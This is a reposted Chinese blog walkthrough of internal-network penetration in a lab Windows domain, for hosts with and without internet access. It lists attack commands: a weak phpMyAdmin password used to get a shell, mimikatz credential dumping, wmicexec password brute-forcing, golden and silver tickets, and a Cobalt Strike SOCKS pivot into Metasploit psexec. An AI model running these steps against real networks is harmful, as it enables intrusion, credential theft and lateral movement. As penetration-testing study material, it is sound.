内网渗透-域内有网和无网
生活随笔
收集整理的這篇文章主要介紹了
内网渗透-域内有网和无网
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
文章目錄
- 前言
- 域內主機有網
- 攻擊流程
- 域內主機無網
- 操作流程
前言
在滲透測試的過程中,拿下域內一臺主機以后,有時候內網的其他主機有網,有時候沒網,此時,如果有網我們就按常規的滲透測試即可,如果沒網我們就應該以該主機作為跳板,使用socks協議或其他辦法,從而實現與無網的主機進行通信
域內主機有網
攻擊流程
通過域環境webserver主機的外網WEB服務開啟到域控權限的獲取
假如已經獲取webserver權限:
0x01:
- 通過phpmyadmin弱口令getshell
0x02:
- msf生成 msf監聽 getsystem upload ‘/root/x64’ c:\test mimikatz
privilege::debug sekurlsa::logonpasswords
0x03:
- 批處理wmicexec測試弱口令 29 31 32 IP存在
0x04:
- 獲取29 31 32權限 反彈msf getsystem
0x05
- 批處理wmicexec測試弱口令 21中標
- execute -f cmd.exe -H -i 0x06
- 導出所有hash 進行黃金白銀票據
域內主機無網
Msf
- 拿下weserver,發現有兩個網段,192.168.3.31 192.168.230.131
假設192.168.230.131為外網,192.168.3.31為內網 - 又發現內網其他主機都沒有聯網,只有webserver聯網了。
- 此時,可以用webserver作為跳板,用cs開啟socks,并用msf
操作流程
#cobalt strike
- 啟動,監聽,生成,上線,提權
- cs啟動sockt4 生成監聽端口跳板,將setg Proxies
- socks4:192.168.230.133:xxxxx復制到msf
msfconsole
- 加載代理:setg Proxies socks4:192.168.230.133:xxxxx
- 攻擊模塊:ms17010 ms14068 smb psexec等
- use exploit/windows/smb/psexec
#自己綁定自己,就實現了無網探針
- set payload bind_tcp
- set smbuser administrator
- set smbpass admin!@#45
- 上傳mimikatz:upload ‘/root/x64’ c:\test
- mimikatz privilege::debug sekurlsa::logonpasswords
總結
以上是生活随笔為你收集整理的内网渗透-域内有网和无网的全部內容,希望文章能夠幫你解決所遇到的問題。